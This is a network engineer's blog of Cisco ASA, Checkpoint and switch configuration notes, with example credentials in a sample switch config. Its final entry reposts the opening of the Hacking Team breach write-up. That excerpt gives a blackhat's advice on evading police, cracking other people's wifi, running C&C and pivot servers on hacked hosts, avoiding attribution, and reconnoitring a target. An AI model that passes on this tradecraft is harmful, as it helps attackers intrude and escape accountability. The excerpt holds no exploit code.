Friday, 23 December 2016

kiwi syslog server notes

You can setup several displays. Display 00 is default and is usually everything

Configure circular logging
Its a good idea to setup display 01 as (drop-deny)
Create a new rule call it drop/deny
Add a filter choose simple filter put in "drop" "deny"
Add the action of display and choose display 01
In the setup section go to display 01 and update the name to display 01 (drop-deny)
You can add other actions like send email etc
You can create lots of displays for VPN troubleshooting etc
Also enable the highlighting options, defaults are decent, you can edit as needed.
You can also tick an option to auto scale width to fit messages


I like this file name
E:\syslog\%IPAdd4-%DateISO.txt

Worth installing tail also. (cygwin is good)

Monday, 19 December 2016

packet capture on checkpoint firewall

Use the topology table on the checkpoint to see what interface you need to monitor

netstat -nr | grep x.x.x.x can be useful too

tcpdump -i eth5 -s0 host 192.168.1.50 -w /var/tmp/packet-capture.pcap


Copy your .pcap file off with win scp and open in wireshark

or read on CLI
tcpdump -r /var/tmp/packet-capture.pcap

Friday, 2 December 2016

hairpin / u-turn on ASA

Anyconnect NAT
Say you want anyconnect users to connect but then get to the internet via your public IP. You'll need the same securitycommands too

Same as your anyconnect pool
object network OBJ-10.50.150.0
 subnet 10.50.150.0 255.255.255.0

object network OBJ-10.50.150.0
 nat (OUTSIDE,OUTSIDE) dynamic interface


Hair-pin NAT
This is a NAT where I wanted to access a DMZ server on its public IP from the inside LAN
Need to set some objects up first.

nat (INSIDE,DMZ) source static OBJ-10.59.0.0-19 OBJ-10.59.0.0-19 destination static OBJ-SERVER-PUB-IP OBJ-172.59.0.10 no-proxy-arp 


Re-write DNS
Simple solution than above
object network DMZ-WEBSERVER
 nat (DMZ,OUTSIDE) static 100.190.220.74 dns

Use the created xlate to rewrite DNS record

Wednesday, 30 November 2016

add a gui client IP on checkpoint

SSH into the CP management server
cpconfig
3)  GUI Clients
Add the IP address

In smart dashboard go into users and administrators section
Create the user and assign as password under authentication

see also
http://www.roesen.org/files/cp_cli_ref_card.pdf

Monday, 28 November 2016

replacing an ASA steps

Before switching to get an idea of numbers you should see after switching, get a screenshot of the following:
sh conn count
sh xlate count
sh crypto map sa
Identify important VPNs
Get VPN PSKs with more system:running-config
Check for any certificates installed on ASA (they cannot be copied, must be added again)
Do full backup in ASDM make sure you have your configs.


Switch over cables
First thing make sure you have internet access
Make sure interfaces have been "no shut"
Often you have to unplug and re-plug cables on ISP devices to resolve arp cache issues
Ping out all interfaces to ensure all VLANs etc are working
Once we have that look at VPNs make sure they are up
You might need to generate some traffic to bring it up.
Check anyconnect from outside is working
Check ASDM / anyconnect image
Re-install certificates


Storage device not found. Install drive and try again. Cisco Firepower

When trying to install the cisco firepower you get the error below

When you run this command:
sw-module module sfr recover boot
The ASA returns the error:
Storage device not found.  Install drive and try again.

Some users have reported reloading the ASA resolves this (if you have SSD installed)

Most likely you are missing your SSD drive, either its not installed, broken or ASA was replaced but no SSD was sent with the replacement or it was never swapped from the old unit to the replacement unit.

You can see if you have ssd installed with "sh inv" it should look like this

Name: "Chassis", DESCR: "ASA 5525-X with SW, 8 GE Data, 1 GE Mgmt, AC"
PID: ASA5525           , VID: V04     , SN: ABCXXXXXXX

Name: "Storage Device 1", DESCR: "Model Number: Micron_M550_MTFDDAK128MAY"
PID: N/A               , VID: N/A     , SN: EFGXXXXXXX

If you don't see a storage device its not there.

If you still have your old unit you can try swap the SSD
Otherwise contact Cisco (or your support) about getting replacement


Commands to collect from CLI for cisco TAC

Show inv

Show module

Show raid



Monday, 31 October 2016

quick way to check if a port is open linux


$ nc -zv 159.134.168.117 80 443
Connection to 159.134.168.117 80 port [tcp/http] succeeded!
Connection to 159.134.168.117 443 port [tcp/https] succeeded!

Monday, 24 October 2016

setup DHCP on cisco ASA

dhcpd dns 10.30.0.1 10.30.0.2
dhcpd wins 10.32.0.1
dhcpd domain mydomain.com
dhcpd auto_config outside
dhcpd address 10.30.14.20-10.32.14.199 inside
dhcpd enable inside
dhcpd address 10.30.114.10-10.32.114.199 VOICE
dhcpd enable VOICE

DHCP options
dhcpd option [x] [ascii|hex|ip]

Default GW
dhcpd option 3 ip 10.30.0.254

New reservation command as of 9.13.1
dhcpd reserve-address 10.20.14.50 xxx.yyyy.zzzz inside

Show commands
show dhcpd binding

Clear commands
clear dhcpd binding all
clear dhcpd binding 10.30.14.20

Thursday, 6 October 2016

checkpoint interface spoofing

use tracker to see the interface where the traffic is being dropped
Check what firewall and interface it was dropped on
Open the correct firewall policy in smart dashboard
Go to groups -> find the interface
add the network to the interface

Wednesday, 5 October 2016

sample switch config

Setup a local user
username local-user privilege 15 password 0 P@55w0rd
username MYUSER privilege 15 algorithm-type scrypt secret P@55w0rd

Set the enable secret
enable secret s3cr3t

Save 
write mem

Set hostname
hostname SITE-3650

Don't try to look up hostnames
no ip domain lookup 

Set up the line settings
line con 0
 logging synchronous
line vty 0 4
 transport input ssh
line vty 5 15
 transport input ssh


Enable cdp
cdp run

set ntp server
ntp server 172.30.123.1

Set default gateway (L2)
ip default-gateway 172.30.1.1


Set banner
banner login ^
*** MY BANNER ***
^

Enable ip routing (L3 functions)
ip routing

Set L3 default route
ip route 0.0.0.0 0.0.0.0 vlan 10 172.172.10.249

Set domain name
ip domain-name mydomain.ie



Generate rsa key (for ssh)
conf t
crypto key generate rsa general-keys label MYLABEL modulus 2048

Setup spanning tree
spanning-tree mode rapid-pvst

Set up local logging buffer
Generally its set very low. Use dir to check how much space you have.
If you have a syslog server its not an issue
logging buffered 5000000 debugging

Set up AAA
aaa new-model
!
!
aaa group server radius NPS
 server 172.16.50.1 auth-port 1645 acct-port 1646
 server 172.16.50.2 auth-port 1645 acct-port 1646
!
aaa authentication login default group NPS local
aaa authentication login CON local
aaa authentication dot1x default group NPS local
!
!
!
aaa session-id common

Setup SVI on the switch
interface Vlan10
 ip address 172.30.10.253 255.255.255.0
 ip helper-address 172.16.1.50

Set management interface
interface Loopback100
 description SWITCH MGMT
 ip address 172.30.100.10 255.255.255.255

Setup so radius can come from the management IP
ip radius source-interface Loopback100

Set up radius
radius-server host 172.16.50.1 auth-port 1645 acct-port 1646
radius-server host 172.16.50.1 auth-port 1645 acct-port 1646
radius-server retransmit 0
radius-server timeout 1
radius-server key MY-SECRET-RADIUS-KEY


****
Side note - Upgraded a 3750E to 15.2 and it broke Radius
Change to calling the Group


aaa group server radius NPS
server name NPS-1
server name NPS-2

radius server NPS-1
address ipv4 172.16.35.63 auth-port 1645 acct-port 1646
pac key **********
!
radius server NPS-2
address ipv4 172.16.35.43 auth-port 1645 acct-port 1646
pac key ********
!



Setup your access ports
interface FastEthernet0/1
 switchport mode access (set the port as an access port)
 switchport access vlan 10 (data vlan for PC)
 switchport voice vlan 200 (voice vlan for IP phone)

 switchport port-security (turn on port security)
 switchport port-security maximum 2 (max 2 MAC's phone and PC)
 switchport port-security violation restrict (log and ignore the extra traffic)
 spanning-tree portfast (don't wait 60 seconds to bring the port up)
 spanning-tree bpduguard enable (err-disable the port if we detect switch/BPDU)
 no shutdown (bring the port up)

Setup trunk ports
interface GigabitEthernet0/3
 switchport trunk encapsulation dot1q
 switchport mode trunk





You may have to set tftp source interface
ip tftp source-interface

Setup VTP
You won't find settings in show run. Use "sh vtp status" and "sh vtp password" on another switch and configure the same settings on the new switch. Most likely you'll want to use the client mode.
SITE-3650#sh vtp status
VTP Version                     : running VTP2
Configuration Revision          : 15
Maximum VLANs supported locally : 1005
Number of existing VLANs        : 30
VTP Operating Mode              : Client
VTP Domain Name                 : MYDOMAIN
VTP Pruning Mode                : Disabled
VTP V2 Mode                     : Enabled
VTP Traps Generation            : Disabled
MD5 digest                      : 0x7C 0x91 0x1E 0x52 0x99 0x80 0x60 0x5E




This one has ACL applied to SSH
line con 0
 session-timeout 15
 exec-timeout 0 0
 logging synchronous
 login authentication CON
 history size 256
line vty 0 4
 session-timeout 15
 access-class 2 in
 exec-timeout 15 0
 password 7 0034212757550A045E72
 logging synchronous
 length 0
 history size 256
 transport input ssh
 transport output ssh
line vty 5 15
 session-timeout 15
 access-class 2 in
 exec-timeout 15 0
 password 7 0034212757550A045E72
 logging synchronous
 history size 256
 transport input ssh
 transport output ssh

Setup port channel interface if needed
interface Port-channel40
 description "*** PortChan members gig1/1/1 and gig2/1/1 ***"
 switchport trunk encapsulation dot1q
 switchport trunk native vlan 10
 switchport mode trunk
 switchport nonegotiate
 storm-control broadcast level 10.00
 ip dhcp snooping trust

Setup port channel members (channel-group)
interface GigabitEthernet1/1/1
 description *** Link to core ***
 switchport trunk encapsulation dot1q
 switchport trunk native vlan 100
 switchport mode trunk
 switchport nonegotiate
 srr-queue bandwidth share 10 10 60 20
 priority-queue out
 mls qos trust dscp
 storm-control broadcast level 10.00
 channel-group 40 mode on
 ip dhcp snooping trust
end

interface GigabitEthernet2/1/1
 description *** link to core ***
 switchport trunk encapsulation dot1q
 switchport trunk native vlan 100
 switchport mode trunk
 switchport nonegotiate
 srr-queue bandwidth share 10 10 60 20
 priority-queue out
 mls qos trust dscp
 storm-control broadcast level 10.00
 channel-group 40 mode on
 ip dhcp snooping trust

Setup eigrp
router eigrp 100
network 172.30.1.0 0.0.0.255 (wildcard mask)

installing certificates on the cisco ASA

Wildcard cert

GoDaddy steps
What you need
  • Purchased wildcard cert
  • Login details for godaddy site
  • Access to public DNS provider to create URLs and TXT record
  • Access to ASA/ASDM
  • Access to domain controller/server where you can install openssl
Saving the private key
When setting up a new wildcard godaddy gives you the option to save the CSR and the private key. You should save these. Client might have created it already. You can look on the domain controller or email server for it and see if you can export it from mmc -> certificates snap in. If it can't be found or lost you can rekey the cert, contact godaddy for steps. I believe the rekey can cause issues if the cert is already installed somewhere as now the private key won't match. Try to avoid this.
DNS provider
You need to verify a wildcard with a DNS TXT record, need to contact DNS provider. Godaddy provide instructions.
You can check the TXT records here https://dnslookup.online/txt.html
Once the set is setup you can download the zip file. Choose the "other" option
You may need to get "vpn.domain.ie" pointing to public IP of ASA
Create combined PKCS12 / PFX file with Openssl
Now use openssl to bundle private key + wildcard cert into one file with a password.
You may need to install openssl (http://gnuwin32.sourceforge.net/summary.html)
Openssl command:
pkcs12 -export -inkey MY_PRIV_KEY.key -in WILDCARD_CERT.crt -out STAR_DOMAIN_COMBINED.p12
You will be asked for password here, save this password.
Good idea to install the PFX on the customer domain controller for safe keeping. 
Install as exportable
Choose the computer account
Choose the  personal cert store. 
You can find the cert later in start -> run -> mmc -> add certs snap-in.
ASA install
Now install the STAR_DOMAIN_COMBINED.p12 on cisco ASDM.
ASDM -> Configuration -> Certificate Management -> CA Certificates -> Add -> CA cert (from zip file downloaded from godaddy)
Now click on Identity Certs -> Add  
Choose "Import the identity cert from a file (PKCS12)
Enter the password you entered at the openssl step
Select the STAR_DOMAIN_COMBINED.p12
Click "Add certificate"
Apply to interface. 
Configuration -> Advanced -> SSL settings
Click on outside interface -> Edit button and select cert
Testing
Go to your anyconnect URL. 
Confirm the cert is setup with chome -> developer tools -> security or this one:
https://www.sslshopper.com/ssl-checker.html



This is the process of installing a wildcard cert if you have one:
https://www.tunnelsup.com/adding-a-wildcard-ssl-certificate-to-a-cisco-asa/

Get the following
The password used to export the certs (If password not setup – you can generate this by using OPENSSL app)
The certificate private key (pfx) file (in pem format)
The wildcard certificate (in pem format)
The intermediary certificate (in pem format)

Customer should have access to their Trusted root CA portal where you can download most files. The customer should have the private key (pfx) file and the password for it. The trusted root CA does not hold that. Its generated when the cert is used for the first time.

In the past we have found the customer import the private key onto a webserver but didn't save the private key. We were able to export the private key from the web server. Had to open mmc add certificate snap-in and add for the computer account.

Download and install win32/63 openssl to convert your cert into the correct format.
See https://support.citrix.com/article/CTX136444

Use openssl to create the pkcs12 file. This is done by bundling the private key + the wildcard cert.

Openssl command:
pkcs12 -export -inkey MY_PRIV_KEY.key -in WILDCARD_CERT.crt -out STAR_DOMAIN_COMBINED.p12

openssl pkcs12 -export -in CERT.crt -inkey PKEY.key -certfile sf_bundle-g2-g1.crt -out BUNDLE.pfx 

Make sure to save the password you enter. Now this file can be imported into ASDM.

Can be done here https://www.sslshopper.com/ssl-converter.html
However its advised you don't upload your certs to a third party use openssl on your own PC

If you have an old/expired wildcard cert you can remove it now, otherwise you might get an error when trying to assign the new one to an interface.

Add the CA cert (pem - plain text BEGIN CERT etc)
Configuration > Device Management > Certificate Management > CA Certificates
Add the pkcs12 cert (pfx) with password
Configuration > Device Management > Certificate Management > Ident Certificates
Assign the cert to the interface (advanced -> SSL)
Configuration > Device Management > Advanced > SSL

This is the process of creating an ident cert and getting it signed by your CA, they send you a signed cert that you can install.
https://www.tunnelsup.com/adding-an-ssl-certificate-on-an-asa/

Ident certs
Create ident cert (config -> Firewall -> Advanced -> Certificate management -> Ident cert)
Add new (create a new key pair if you need to)
Click select button and fill in the details
In this example the url I have bought the cert for is is remote.domain.ie
subject-name CN=remote.domain.ie,OU=IT,O=Customer,C=IE,St=Leinster,L=Dublin
Export cert and send to CA
CA sends back signed cert
Install signed cert
Apply to interface.


After installing
Export the cert + key from ASDM and install the .pfx in their windows server so they don't lose it. Don't forget to record password.
 
More on certs

.csr
This is a Certificate Signing Request. Some applications can generate these for submission to certificate-authorities. The actual format is PKCS10 which is defined in RFC 2986. It includes some/all of the key details of the requested certificate such as subject, organization, state, whatnot, as well as the public key of the certificate to get signed. These get signed by the CA and a certificate is returned. The returned certificate is the public certificate (which includes the public key but not the private key), which itself can be in a couple of formats.

.pem
Defined in RFC's 1421 through 1424, this is a container format that may include just the public certificate (such as with Apache installs, and CA certificate files /etc/ssl/certs), or may include an entire certificate chain including public key, private key, and root certificates. Confusingly, it may also encode a CSR (e.g. as used here) as the PKCS10 format can be translated into PEM. The name is from Privacy Enhanced Mail (PEM), a failed method for secure email but the container format it used lives on, and is a base64 translation of the x509 ASN.1 keys.
.key This is a PEM formatted file containing just the private-key of a specific certificate and is merely a conventional name and not a standardized one. In Apache installs, this frequently resides in /etc/ssl/private. The rights on these files are very important, and some programs will refuse to load these certificates if they are set wrong.

.pkcs12 .pfx .p12
Originally defined by RSA in the Public-Key Cryptography Standards, the "12" variant was enhanced by Microsoft. This is a passworded container format that contains both public and private certificate pairs. Unlike .pem files, this container is fully encrypted. Openssl can turn this into a .pem file with both public and private keys: openssl pkcs12 -in file-to-convert.p12 -out converted-file.pem -nodes
A few other formats that show up from time to time:

.der
A way to encode ASN.1 syntax in binary, a .pem file is just a Base64 encoded .der file. OpenSSL can convert these to .pem (openssl x509 -inform der -in to-convert.der -out converted.pem). Windows sees these as Certificate files. By default, Windows will export certificates as .DER formatted files with a different extension. Like...

.cert .cer .crt
A .pem (or rarely .der) formatted file with a different extension, one that is recognized by Windows Explorer as a certificate, which .pem is not.

.p7b
Defined in RFC 2315, this is a format used by windows for certificate interchange. Java understands these natively. Unlike .pem style certificates, this format has a defined way to include certification-path certificates.

.p7s
Looks like this one is used for signing emails

.crl A certificate revocation list. Certificate Authorities produce these as a way to de-authorize certificates before expiration. You can sometimes download them from CA websites.
In summary, there are four different ways to present certificates and their components:

PEM Governed by RFCs, it's used preferentially by open-source software. It can have a variety of extensions (.pem, .key, .cer, .cert, more)

PKCS7 An open standard used by Java and supported by Windows. Does not contain private key material.

PKCS12 A private standard that provides enhanced security versus the plain-text PEM format. This can contain private key material. It's used preferentially by Windows systems, and can be freely converted to PEM format through use of openssl.

DER The parent format of PEM. It's useful to think of it as a binary version of the base64-encoded PEM file. Not routinely used by much outside of Windows.

x509 (can be .pfx and .der .cer .crt)
Usually in some directory like C:\webserver\apache\cert
Drop in the new server.crt (just cert file)
Drop in server.key (psk) in the same directory 
Restart webserver

MII means base64 encoded you will often see this with x509 certs

cryptography, encryption and certificates

Cryptography, encryption and certificates

Data at rest (setting in memory or on hard disks)
Data in motion (moving through the network)

Managemnet plane - ASDM/web interface / CLI
Control Plane - Routing protocols, STP etc
Data plane - the packets passing etc

We need to protect both

Encryption - used to keep data confidential at rest or in motion
Keys - Data is encrypted with a key. The key is also used to decrypt the data.
Cipher text - data that has been encrypted
Clear text - the unencrypted data
Symmetrical vs Asymmetical
Symmetrical - 1 key is used to encrypt and decrypt the data (DES, 3DES, AES). Used for bulk encryption data on disks etc.
Asymmetrical - 2 keys known as a key-pair, higher CPU overhead, used with authentication.
data encrypted by key1 can only be decrypted by key2
data encrypted by key2 can only be decrypted by key1
key1 = private key
key2 = public key (public keys can be exchanged, then we encrypt with private key)
RSA, DSA


Hash/HMAC - Integrity, making sure it hasn't been manipulated along the way (MD5,SHA). We hash the data (math algorithm) which gives us a result known as a digest.
If we check the the hash and if it has been changed they will know. HMAC is used to secure the hash by putting a secret key in the HMAC. HMAC stops man in the middle attacks.

Digital signature - encrypted has of the private key is the digital signature
To digitaly sign you need public/private key pair setup
Data generate a hash
Encrypt the hash with the private key (digital signature)
Data+Encrypted hash is sent.
Data is hashed
Encrypted hash is decrypted with the public key from the sender
Compare the hash we calculated with the decrypted hash and make sure they match

pem format - files that end in the suffix ‘.pem’ or ‘.key’ or '.crt' usually are in this format. If you open the file in notepad it will have BEGIN CERT and END CERT and the top and bottom.

pkcs12 format - files often end in .pfx or .p12. The file will be unreadable by notepad (encrypted) it is created by combining the private key and the ca cert(intermediate) with a tool like openssl. Digicert prvides a tool for windows.


Friday, 23 September 2016

fibre optic cables

fibre cables have different terminations. You need to select the right cable which can connect to your deivce and the the other end to fiber patch panel so you need to check both. Some times the cables are mixed up in the patch so you need to pop the cables out and swap them around

ST (straight tip)
SC (Subscriber connector)
LC (Local connector)
MT-RJ 

LR = long range / single mode

SR = short range / multimode

Have seen 10g LRM SFPs work on both multimode/singlemode cable.


You need to see how it is terminated at each patch point.
You need to have the correct SFP in your network device so you can plug the fibre in.
You also need to select the right cables SC-LC, ST-ST etc.

Look a bit into the SFP you should see a light on one side. This is the transmit side and needs to be the same all the way. You won't be able to see the light with single mode (its too narrow for the human eye). Need to use device db signals

-> red light transmit
<- no light receive

There are OM values that relate to cable distance will update more on that later

10Gig-Base-SR (closer to 0 is better)
Typical working transmit range: -1 to -7
Typical working transmit range: -1 to -9.9

When we see a Rx power around -14 dBm or lower there is typically some sort of fault in the cable plant (bad splice, dirty connector, poorly seated jumper etc.) that's causing excessive signal loss.

If either Tx or Rx is in the -30 dBm or lower range that's usually indicative of there being no actual signal received and the transceiver is reporting the "noise floor" of the receiver stage. (https://en.wikipedia.org/wiki/Noise_floor)


https://www.cisco.com/c/en/us/products/interfaces-modules/transceiver-modules/index.html

CLI commands:

Router:

sh hw-module subslot 0/0 transceiver 2 status

sh hw-module subslot 0/0 transceiver 2 idprom

Switch:

sh int g1/0/1 status

sh int gig1/0/1 capabilities

sh int gig1/0/1 transceiver

 

Monday, 19 September 2016

Let cisco switch use 3rd party SFPs


Cisco SFP 
Left side = transmit
Right side = Recieve
http://www.cisco.com/c/en/us/td/docs/interfaces_modules/transceiver_modules/installation/note/78_15160.html


Commands to allow using non Cisco SFPs
service unsupported-transceiver
no errdisable detect cause gbic-invalid


taken from:
http://www.firewall.cx/cisco-technical-knowledgebase/cisco-switches/866-cisco-switches-3rd-party-sfp.html

Check your sfp
sh int gigabitEthernet 0/3 status 
sh int gigabitEthernet 0/3 capabilities (check type)


Thursday, 8 September 2016

VPN uptime

See how long a VPN is up
show vpn-sessiondb l2l filter name x.x.x.x

Tuesday, 26 July 2016

see what port ASDM is running on

You can port scan the firewall or

sh run | i http server enable


add a route on checkpoint CLI

route add -net 10.5.140.0/24 gw 192.168.0.1 (works for lgma need write mode on FW you are adding the route on open the correct policy for each fw before making the change)

Remove a route worked on PH
route del -net 192.168.80.0/20 gw 192.168.80.51


route add -net 192.168.80.0/20 dev eth15
gives this kind of route
192.168.80.0    0.0.0.0         255.255.240.0   U         0 0          0 eth15

Maybe this in newer versions
https://supportcenter.checkpoint.com/supportcenter/portal%3FeventSubmit_doGoviewsolutiondetails%3D%26solutionid%3Dsk39746

clish (enter clish if no already there)
set static-route 192.168.0.0/24 nexthop gateway address 10.0.0.1 priority 1 on
save config
exit
netstat -nr | grep 192.168.0.0
Run on both FWs
(works on REV fws)

Watch out for NAT's you may need to add to grp_No_NAT
There may be a static server NAT for the server.

Show routes
netstat -nr - show all routes

netstat -nr | grep 10.5.140

185.5.241.204

Monday, 18 July 2016

Use nslookup to find the IP addresses of the domain controllers

You can use Nslookup is a command-line tool that displays information you can use to diagnose Domain Name System (DNS) infrastructure.
  1. Click Start, and then click Run.
  2. In the Open box, type cmd.
  3. Type nslookup, and then press ENTER.
  4. Type set type=all, and then press ENTER.
  5. Type _ldap._tcp.dc._msdcs.

Wednesday, 1 June 2016

run ASA web interface on another port


ASDM 
 
ASA(config)#http server enable 8080

https://192.168.1.1:8080

WebVPN
ASA(config)#webvpn
ASA(config-webvpn)#enable outside
ASA(config-webvpn)#port 65010
 
https://192.168.1.1:65010 
 
https://www.cisco.com/c/en/us/support/docs/security/adaptive-security-device-manager/118842-technote-asdm-00.html 
 
 
 

You also need to allow it under the ASDM config
http server enable 8080
http pub.pub.pub.pub 255.255.255.255 outside
http prv.prv.prv.prv 255.255.255.0 inside

Same for SSHssh pub.pub.pub.pub 255.255.255.255 outsides
ssh prv.prv.prv.prv 255.255.255.0 inside
 
Don't forget crypto key generate 
 

Tuesday, 10 May 2016

same network in use on both sides of the VPN

Often small businesses will use a 10.0.0.0/8, 192.168.0.0 /16 etc as they don't know what to fill in.


====SIDE A====
object network REAL-LOCAL-A-NET
subnet 192.168.1.0 255.255.255.0

object network MAPPED-LOCAL-A-NET
subnet 172.18.19.0 255.255.255.0

object network MAPPED-REMOTE-B-NET
subnet 172.18.20.0 255.255.255.0

nat (inside,outside) source static REAL-LOCAL-A-NET MAPPED-LOCAL-A-NET destination static MAPPED-REMOTE-B-NET MAPPED-REMOTE-B-NET

access-list VPN-ACL permit ip object MAPPED-LOCAL-A-NET object MAPPED-REMOTE-B-NET


===SIDE B====

object network REAL-LOCAL-B-NET
subnet 192.168.1.0 255.255.255.0

object network MAPPED-LOCAL-B-NET
subnet 172.18.20.0 255.255.255.0

object network MAPPED-REMOTE-A-NET
subnet 172.18.19.0 255.255.255.0

nat (inside,outside) source static REAL-LOCAL-B-NET MAPPED-LOCAL-B-NET destination static MAPPED-REMOTE-A-NET MAPPED-REMOTE-A-NET

Wednesday, 20 April 2016

hacking team breach

From
http://pastebin.com/raw/0SNSvyjJ

--[ 1 - Introduction ]----------------------------------------------------------

You'll notice the change in language since the last edition [1]. The
English-speaking world already has tons of books, talks, guides, and
info about hacking. In that world, there's plenty of hackers better than me,
but they misuse their talents working for "defense" contractors, for intelligence
agencies, to protect banks and corporations, and to defend the status quo.
Hacker culture was born in the US as a counterculture, but that origin only
remains in its aesthetics - the rest has been assimilated. At least they can
wear a t-shirt, dye their hair blue, use their hacker names, and feel like
rebels while they work for the Man.

You used to have to sneak into offices to leak documents [2]. You used to need
a gun to rob a bank. Now you can do both from bed with a laptop in hand [3][4].
Like the CNT said after the Gamma Group hack: "Let's take a step forward with
new forms of struggle" [5]. Hacking is a powerful tool, let's learn and fight!

[1] http://pastebin.com/raw.php?i=cRYvK4jb
[2] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
[3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html
[4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf 
[5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group


--[ 2 - Hacking Team ]----------------------------------------------------------

Hacking Team was a company that helped governments hack and spy on
journalists, activists, political opposition, and other threats to their power
[1][2][3][4][5][6][7][8][9][10][11]. And, occasionally, on actual criminals
and terrorists [12]. Vincenzetti, the CEO, liked to end his emails with the
fascist slogan "boia chi molla". It'd be more correct to say "boia chi vende
RCS". They also claimed to have technology to solve the "problem" posed by Tor
and the darknet [13]. But seeing as I'm still free, I have my doubts about
its effectiveness.

[1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/
[2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html
[3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/
[4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/
[5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/
[6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/
[7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/
[8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal
[9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/
[10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/
[11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/
[12] http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html
[13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web


--[ 3 - Stay safe out there ]---------------------------------------------------

Unfortunately, our world is backwards. You get rich by doing bad things and go
to jail for doing good. Fortunately, thanks to the hard work of people like
the Tor project [1], you can avoid going to jail by taking a few simple
precautions:

1) Encrypt your hard disk [2]

   I guess when the police arrive to seize your computer, it means you've
   already made a lot of mistakes, but it's better to be safe.

2) Use a virtual machine with all traffic routed through Tor

   This accomplishes two things. First, all your traffic is anonymized through
   Tor. Second, keeping your personal life and your hacking on separate
   computers helps you not to mix them by accident.

   You can use projects like Whonix [3], Tails [4], Qubes TorVM [5], or
   something custom [6]. Here's [7] a detailed comparison.

3) (Optional) Don't connect directly to Tor
   
   Tor isn't a panacea. They can correlate the times you're connected to Tor
   with the times your hacker handle is active. Also, there have been
   successful attacks against Tor [8]. You can connect to Tor using other
   peoples' wifi. Wifislax [9] is a linux distro with a lot of tools for
   cracking wifi. Another option is to connect to a VPN or a bridge node [10]
   before Tor, but that's less secure because they can still correlate the
   hacker's activity with your house's internet activity (this was used as
   evidence against Jeremy Hammond [11]).

   The reality is that while Tor isn't perfect, it works quite well. When I
   was young and reckless, I did plenty of stuff without any protection (I'm
   referring to hacking) apart from Tor, that the police tried their hardest
   to investigate, and I've never had any problems.

[1] https://www.torproject.org/
[2] https://info.securityinabox.org/es/chapter-4
[3] https://www.whonix.org/
[4] https://tails.boum.org/
[5] https://www.qubes-os.org/doc/privacy/torvm/
[6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy
[7] https://www.whonix.org/wiki/Comparison_with_Others
[8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/
[9] http://www.wifislax.com/
[10] https://www.torproject.org/docs/bridges.html.en
[11] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html


----[ 3.1 - Infrastructure ]----------------------------------------------------

I don't hack directly from Tor exit nodes. They're on blacklists, they're
slow, and they can't receive connect-backs. Tor protects my anonymity while I
connect to the infrastructure I use to hack, which consists of:

1) Domain Names

   For C&C addresses, and for DNS tunnels for guaranteed egress.

2) Stable Servers

   For use as C&C servers, to receive connect-back shells, to launch attacks,
   and to store the loot.

3) Hacked Servers

   For use as pivots to hide the IP addresses of the stable servers. And for
   when I want a fast connection without pivoting, for example to scan ports,
   scan the whole internet, download a database with sqli, etc.

Obviously, you have to use an anonymous payment method, like bitcoin (if it's
used carefully).


----[ 3.2 - Attribution ]-------------------------------------------------------

In the news we often see attacks traced back to government-backed hacking
groups ("APTs"), because they repeatedly use the same tools, leave the same
footprints, and even use the same infrastructure (domains, emails, etc).
They're negligent because they can hack without legal consequences.

I didn't want to make the police's work any easier by relating my hack of
Hacking Team with other hacks I've done or with names I use in my day-to-day
work as a blackhat hacker. So, I used new servers and domain names, registered
with new emails, and payed for with new bitcoin addresses. Also, I only used
tools that are publicly available, or things that I wrote specifically for
this attack, and I changed my way of doing some things to not leave my usual
forensic footprint.


--[ 4 - Information Gathering ]-------------------------------------------------

Although it can be tedious, this stage is very important, since the larger the
attack surface, the easier it is to find a hole somewhere in it.


----[ 4.1 - Technical Information ]---------------------------------------------

Some tools and techniques are:

1) Google

   A lot of interesting things can be found with a few well-chosen search
   queries. For example, the identity of DPR [1]. The bible of Google hacking
   is the book "Google Hacking for Penetration Testers". You can find a short
   summary in Spanish at [2].

2) Subdomain Enumeration

   Often, a company's main website is hosted by a third party, and you'll find
   the company's actual IP range thanks to subdomains like mx.company.com or
   ns1.company.com. Also, sometimes there are things that shouldn't be exposed
   in "hidden" subdomains. Useful tools for discovering domains and subdomains
   are fierce [3], theHarvester [4], and recon-ng [5].

3) Whois lookups and reverse lookups

   With a reverse lookup using the whois information from a domain or IP range
   of a company, you can find other domains and IP ranges. As far as I know,
   there's no free way to do reverse lookups aside from a google "hack":
   
   "via della moscova 13" site:www.findip-address.com
   "via della moscova 13" site:domaintools.com

4) Port scanning and fingerprinting

   Unlike the other techniques, this talks to the company's servers. I
   include it in this section because it's not an attack, it's just
   information gathering. The company's IDS might generate an alert, but you
   don't have to worry since the whole internet is being scanned constantly.

   For scanning, nmap [6] is precise, and can fingerprint the majority of
   services discovered. For companies with very large IP ranges, zmap [7] or
   masscan [8] are fast. WhatWeb [9] or BlindElephant [10] can fingerprint web
   sites.

[1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html
[2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf
[3] http://ha.ckers.org/fierce/
[4] https://github.com/laramies/theHarvester
[5] https://bitbucket.org/LaNMaSteR53/recon-ng
[6] https://nmap.org/
[7] https://zmap.io/
